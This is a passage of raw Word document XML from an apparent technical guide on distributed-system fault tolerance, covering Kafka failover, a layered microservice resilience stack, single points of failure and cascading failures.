    <w:p w14:paraId="67FFA173" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Partition leadership transfers to another ISR replica (seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E19709" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Producers/consumers reconnect to new leader automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6C2170" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  No data loss (if acks=all and min.insync.replicas &gt; 1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684BB87A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF104A6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Consumer failure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284C3676" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Consumer group rebalances partitions among remaining consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED224C3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Offset tracking → new consumer picks up where failed one left off.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED902CA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  At-least-once delivery guaranteed (may reprocess some messages).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564CD0D4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.3 Microservice Fault Tolerance Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF43FDD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4442DBE0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>Complete fault tolerance for a microservice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F9EB01" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="35B95BE8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>┌─────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2307A541" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Incoming request                                             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775B7D82" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:t>──────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEAEEB3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Rate limiter (protect from overload)                         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED3EFEA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A7C843" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Load balancer (distribute across instances)                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BA8D87" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD4500D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Multiple instances (redundancy — survive instance failures)   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55100506" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629D8C39" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Timeout (bound latency for downstream calls)                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511946C4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BCA1CC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Retry with backoff (handle transient failures)               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C97EBB8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3ADF29" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Circuit breaker (stop calling dead services)                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9028A0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617337FF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Bulkhead (isolate failures per dependency)                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C38227B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308F914A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Fallback (degrade gracefully)                                │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC59E1A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4EF33B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Hedged requests (reduce tail latency)                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D60995" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3A693A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Idempotency (make retries safe)                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE3B694" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E023CE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>│ Health checks (detect and communicate failures)              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CA8015" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A09534" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Graceful shutdown (drain connections before terminating)      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B888AD6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>└─────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30430E42" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="2FF37F67">
          <v:rect id="_x0000_i6356" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1786C924" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13. Common Fault Tolerance Anti-Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DF2D07" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.1 Single Points of Failure (SPOF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF378E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9301C9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>ANY component that, if it fails, brings down the entire system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB8713E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="64DD4B70" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Common SPOFs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A3E174" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Single database (no replicas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620CE9D8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Single load balancer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2473E0FB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Single DNS provider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8ACB0A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - One person who knows how to fix things ("bus factor = 1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439BE78B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Hard dependency on one external API (no fallback)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0EA014" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Shared NFS mount (single disk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1FFE45" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Single configuration source (if config service is down, nothing starts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096AA990" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="5BF79C9A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Finding SPOFs: For each component, ask: "If this fails, does the system fail?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453FAEFD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  If YES → add redundancy or fallback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37290118" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.2 Cascading Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1BBFC0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3297EDE9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>One failure triggers another, which triggers another, until the entire system is down:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098ED03A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="46D6E69C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D59C896" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  1. Database becomes slow (disk issue).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3870FB22" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  2. Application threads block waiting for DB → thread pool exhausted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615F1C9E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  3. Application stops accepting new requests → load balancer marks it unhealthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D9CE5D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  4. Traffic shifts to remaining instances → they become overloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CE8E03" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  5. They also exhaust thread pools → all instances unhealthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2B0D30" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  6. Total service outage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A5CD45" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="1EC09A06" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Prevention:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE1965E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Timeouts (don't wait forever for slow DB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32528B36" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Circuit breakers (stop trying after N failures).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B36226" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Bulkheads (DB thread pool isolated from other work).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C902E1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Load shedding (reject excess load before exhaustion).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4180389F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Backpressure (signal upstream to slow down).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F08FF28" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
